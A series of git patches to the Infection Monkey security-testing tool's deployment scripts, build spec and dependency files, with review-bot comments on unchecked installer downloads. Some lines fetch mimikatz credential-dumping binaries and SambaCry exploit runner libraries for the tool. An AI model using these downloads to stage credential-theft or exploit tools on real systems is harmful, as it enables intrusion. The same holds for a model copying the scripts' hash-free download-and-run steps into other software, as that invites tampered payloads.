-ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ 
diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] From e7a71e10d8decc92b750fbdd0085e4eded57b850 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 10/44] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- 3 files changed, 57 insertions(+), 60 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 
--- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { 
@@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { 
@@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": "sha512-2bisHwMhxQ3XQz4LiJJwG3360pY965pTl/MRrZYxIBKVj4fOHoDs5aZAkYXGxDRO1Li+SyjTAilQEbOmtQJHzA==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", @@ -15667,14 +15666,14 @@ } }, "react-dom": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.9.0.tgz", - "integrity": "sha512-YFT2rxO9hM70ewk9jq0y6sQk8cL02xm4+IzYBz75CQGlClQQ1Bxq0nhHF6OtSbit+AIahujJgb/CPRibFkMNJQ==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-dom/-/react-dom-16.10.1.tgz", + "integrity": "sha512-SmM4ZW0uug0rn95U8uqr52I7UdNf6wdGLeXDmNLfg3y5q5H9eAbdjF5ubQc3bjDyRrvdAB2IKG7X0GzSpnn5Mg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1", "prop-types": "15.7.2", - "scheduler": "0.15.0" + "scheduler": "0.16.1" } }, "react-event-timeline": { @@ -15719,9 +15718,9 @@ } }, "react-hot-loader": { - "version": "4.12.13", - "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.13.tgz", - "integrity": "sha512-4Byk3aVQhcmTnVCBvDHOEOUnMFMj81r2yRKZQSfLOG2yd/4hm/A3oK15AnCZilQExqSFSsHcK64lIIU+dU2zQQ==", + "version": "4.12.14", + "resolved": "https://registry.npmjs.org/react-hot-loader/-/react-hot-loader-4.12.14.tgz", + "integrity": "sha512-ecxH4eBvEaJ9onT8vkEmK1FAAJUh1PqzGqds9S3k+GeihSp7nKAp4fOxytO+Ghr491LiBD38jaKyDXYnnpI9pQ==", "dev": true, "requires": { "fast-levenshtein": "2.0.6", @@ -15746,7 +15745,7 @@ "integrity": "sha512-0XsbTXxgiaCDYDIWFcwkmerZPSwywfUqYmwT4jzewKTQSWoE6FCMoUVOeBJWK3E/CrWbxRG3m5GzY4lnIwGRBA==", "dev": true, "requires": { - "react-is": "16.9.0" + "react-is": "16.10.1" } }, "json5": { 
@@ -15770,9 +15769,9 @@ } }, "react-is": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.9.0.tgz", - "integrity": "sha512-tJBzzzIgnnRfEm046qRcURvwQnZVXmuCbscxUO5RWrGTXpon2d4c8mI0D8WE6ydVIm29JiLB6+RslkIvym9Rjw==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.10.1.tgz", + "integrity": "sha512-BXUMf9sIOPXXZWqr7+c5SeOKJykyVr2u0UDzEf4LNGc6taGkQe1A9DFD07umCIXz45RLr9oAAwZbAJ0Pkknfaw==", "dev": true }, "source-map": { @@ -16008,9 +16007,9 @@ } }, "react-toggle": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.0.2.tgz", - "integrity": "sha512-EPTWnN7gQHgEAUEmjheanZXNzY5TPnQeyyHfEs3YshaiWZf5WNjfYDrglO5F1Hl/dNveX18i4l0grTEsYH2Ccw==", + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/react-toggle/-/react-toggle-4.1.1.tgz", + "integrity": "sha512-+wXlMcSpg8SmnIXauMaZiKpR+r2wp2gMUteroejp2UTSqGTVvZLN+m9EhMzFARBKEw7KpQOwzCyfzeHeAndQGw==", "requires": { "classnames": "2.2.6" } @@ -16706,9 +16705,9 @@ } }, "scheduler": { - "version": "0.15.0", - "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.15.0.tgz", - "integrity": "sha512-xAefmSfN6jqAa7Kuq7LIJY0bwAPG3xlCj0HMEBQk1lxYiDKZscY2xJ5U/61ZTrYbmNQbXa+gc7czPkVo11tnCg==", + "version": "0.16.1", + "resolved": "https://registry.npmjs.org/scheduler/-/scheduler-0.16.1.tgz", + "integrity": "sha512-MIuie7SgsqMYOdCXVFZa8SKoNorJZUWHW8dPgto7uEHn1lX3fg2Gu0TzgK8USj76uxV7vB5eRMnZs/cdEHg+cg==", "requires": { "loose-envify": "1.3.1", "object-assign": "4.1.1" 
@@ -17936,20 +17935,20 @@ } }, "terser": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.1.tgz", - "integrity": "sha512-pnzH6dnFEsR2aa2SJaKb1uSCl3QmIsJ8dEkj0Fky+2AwMMcC9doMqLOQIH6wVTEKaVfKVvLSk5qxPBEZT9mywg==", + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/terser/-/terser-4.3.4.tgz", + "integrity": "sha512-Kcrn3RiW8NtHBP0ssOAzwa2MsIRQ8lJWiBG/K7JgqPlomA3mtb2DEmp4/hrUA+Jujx+WZ02zqd7GYD+QRBB/2Q==", "dev": true, "requires": { - "commander": "2.20.0", + "commander": "2.20.1", "source-map": "0.6.1", "source-map-support": "0.5.13" }, "dependencies": { "commander": { - "version": "2.20.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.0.tgz", - "integrity": "sha512-7j2y+40w61zy6YC2iRNpUe/NwhNyoXrYpHMrSunaMG64nRnaf96zO/KMQR4OyN/UnE5KLyEBnKHd4aG3rskjpQ==", + "version": "2.20.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.1.tgz", + "integrity": "sha512-cCuLsMhJeWQ/ZpsFTbE765kvVfoeSddc4nU3up4fV+fDBcfUXnbITJ+JzhkdjzOqhURjZgujxaioam4RM9yGUg==", "dev": true }, "source-map": { @@ -17982,7 +17981,7 @@ "schema-utils": "1.0.0", "serialize-javascript": "1.9.1", "source-map": "0.6.1", - "terser": "4.3.1", + "terser": "4.3.4", "webpack-sources": "1.4.3", "worker-farm": "1.7.0" }, @@ -19710,9 +19709,9 @@ } }, "webpack": { - "version": "4.40.2", - "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.40.2.tgz", - "integrity": "sha512-5nIvteTDCUws2DVvP9Qe+JPla7kWPPIDFZv55To7IycHWZ+Z5qBdaBYPyuXWdhggTufZkQwfIK+5rKQTVovm2A==", + "version": "4.41.0", + "resolved": "https://registry.npmjs.org/webpack/-/webpack-4.41.0.tgz", + "integrity": "sha512-yNV98U4r7wX1VJAj5kyMsu36T8RPPQntcb5fJLOsMz/pt/WrKC0Vp1bAlqPLkA1LegSwQwf6P+kAbyhRKVQ72g==", "dev": true, "requires": { "@webassemblyjs/ast": "1.8.5", diff --git a/monkey/monkey_island/cc/ui/package.json b/monkey/monkey_island/cc/ui/package.json index aa85164ce..6743638d5 100644 --- a/monkey/monkey_island/cc/ui/package.json 
+++ b/monkey/monkey_island/cc/ui/package.json @@ -37,7 +37,7 @@ "css-loader": "^1.0.1", "eslint": "^5.16.0", "eslint-loader": "^2.2.1", - "eslint-plugin-react": "^7.14.3", + "eslint-plugin-react": "^7.15.1", "file-loader": "^1.1.11", "glob": "^7.1.4", "html-loader": "^0.5.5", @@ -56,11 +56,11 @@ "phantomjs-prebuilt": "^2.1.16", "react-addons-test-utils": "^15.6.2", "react-event-timeline": "^1.6.3", - "react-hot-loader": "^4.12.13", + "react-hot-loader": "^4.12.14", "rimraf": "^2.7.1", "style-loader": "^0.22.1", "url-loader": "^1.1.2", - "webpack": "^4.40.2", + "webpack": "^4.41.0", "webpack-cli": "^3.3.9", "webpack-dev-server": "^3.8.1" }, @@ -74,7 +74,7 @@ "downloadjs": "^1.4.7", "fetch": "^1.1.0", "file-saver": "^2.0.2", - "filepond": "^4.7.1", + "filepond": "^4.7.2", "js-file-download": "^0.4.8", "json-loader": "^0.5.7", "jwt-decode": "^2.2.0", @@ -85,13 +85,13 @@ "pluralize": "^7.0.0", "prop-types": "^15.7.2", "rc-progress": "^2.5.2", - "react": "^16.9.0", + "react": "^16.10.1", "react-bootstrap": "^0.32.4", "react-copy-to-clipboard": "^5.0.1", "react-data-components": "^1.2.0", "react-desktop-notification": "^1.0.9", "react-dimensions": "^1.3.0", - "react-dom": "^16.9.0", + "react-dom": "^16.10.1", "react-fa": "^5.0.0", "react-filepond": "^7.0.1", "react-graph-vis": "^1.0.2", @@ -101,7 +101,7 @@ "react-router-dom": "^4.3.1", "react-spinners": "^0.5.13", "react-table": "^6.10.3", - "react-toggle": "^4.0.1", + "react-toggle": "^4.1.1", "react-tooltip-lite": "^1.10.0", "redux": "^4.0.4", "sass-loader": "^7.3.1", From 97542107dc657dd312d9da472c71e2b99208661c Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 17:20:14 +0300 Subject: [PATCH 11/44] Fixed bug that caused PATH not to be refreshed after python installation --- deployment_scripts/deploy_windows.ps1 | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index c7192a4c8..87d6bc8cf 100644 
--- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -56,13 +56,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User") Remove-Item $TEMP_PYTHON_INSTALLER # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. If you just installed python you need to restart cmd. - Else, add it manually or reinstall python." + "Python is not found in PATH. Add it to PATH and relaunch the script." return } } From dff71eabc4fedb5b8a3b09c17e691cd43da4dae8 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 09:53:18 +0300 Subject: [PATCH 12/44] Added C++ redistributable required for windows and brought back UPX --- deployment_scripts/config.ps1 | 5 +++++ deployment_scripts/deploy_windows.ps1 | 19 +++++++++++++++++++ monkey/infection_monkey/monkey.spec | 1 + 3 files changed, 25 insertions(+) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index a3dafc66e..095f7b899 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 
@@ -29,13 +29,18 @@ $MK64_DLL = "mk64.zip" $TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" +$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" +$TEMP_UPX_ZIP = "upx.zip" +$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" +$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" $MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" $MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" +$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) 
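Review bot: `Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop` runs a just-downloaded installer without checking its integrity or its exit code; `-ErrorAction Stop` only covers a failure to launch, and `$CPP_URL` is a `go.microsoft.com/fwlink` redirect whose target can change, so the script has no way to know it ran the intended package. Capture the result with `$proc = Start-Process -Wait -PassThru $TEMP_CPP_INSTALLER -ErrorAction Stop` and fail when `$proc.ExitCode -ne 0` (treating 3010, reboot required, as success), and compare `(Get-FileHash -Algorithm SHA256 $TEMP_CPP_INSTALLER).Hash` against an expected value kept next to `$CPP_URL` in config.ps1 (placeholder `<EXPECTED_SHA256>`) before launching. The same download-execute-delete pattern applies to `$TEMP_PYTHON_INSTALLER` earlier in the function and to the UPX and mimikatz archives, so a small hash-check helper would cover all of them. The enclosing `Deploy-Windows` function starts and ends outside the hunk.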
@@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 6245be15ebc0ea280e1dfa9b970b2a63788fd681 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 13/44] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 
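Review bot: `Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue` hides an extraction failure (corrupt or incomplete download), after which `Move-Item` fails on a folder that was never created and the deployment presumably finishes without `upx.exe` while reporting success. Use `Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction Stop`, matching the `-ErrorAction Stop` the Start-Process calls elsewhere in this function use, so a bad archive stops the run with a clear message. The archive is also fetched with no integrity check; an expected hash stored beside `$UPX_URL` in config.ps1 and compared with `Get-FileHash` before extraction would let a tampered or truncated download fail instead of being installed into `bin`. Deploy-Windows begins and ends outside the hunk.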
@@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From eaee0451c50d802f73c370e519d45c31501c5cb1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 14/44] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config 
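Review bot: `[Environment]::SetEnvironmentVariable("Path",$env:Path,"User")` persists the whole process PATH into the user's PATH; the PATH refresh earlier in this function (outside the hunk) appears to build `$env:Path` from the Machine and User values, so every machine-wide entry is copied into user scope each time the Scripts dir is missing. Append to the stored user value instead: `$user_path = [Environment]::GetEnvironmentVariable("Path","User")` and `[Environment]::SetEnvironmentVariable("Path", ($user_path + ";" + $user_python_dir), "User")`, keeping the `$env:Path +=` line for the current session. `cmd.exe /c 'py -m site --user-site'` also depends on the `py` launcher while the rest of the function invokes `python`; if the launcher is absent, `$user_python_dir` holds an error string and the Join-Path result is meaningless, so the output should be checked before it is added to PATH. Deploy-Windows begins and ends outside the hunk.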
@@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" 
@@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl 
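Review bot: `${python_cmd} -m pip install pip` runs without `--user` and without `|| handle_error`, unlike the requirements install two lines below it; as an unprivileged user it presumably either fails on permissions and the script carries on, or installs a second pip that shadows the `python3-pip` package just installed. Write it as `${python_cmd} -m pip install --user --upgrade pip || handle_error`, or drop the line since `python3-pip` already provides pip. In the install branch, `sudo apt install python3.7` directly follows `add-apt-repository` with no index refresh, so on a host that did not already have the PPA the install fails until the `sudo apt-get update` a few lines later runs; moving that update above the install, and adding `|| handle_error` to both lines, would make the failure visible instead of leaving `python_cmd="python3.7"` pointing at a missing interpreter.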
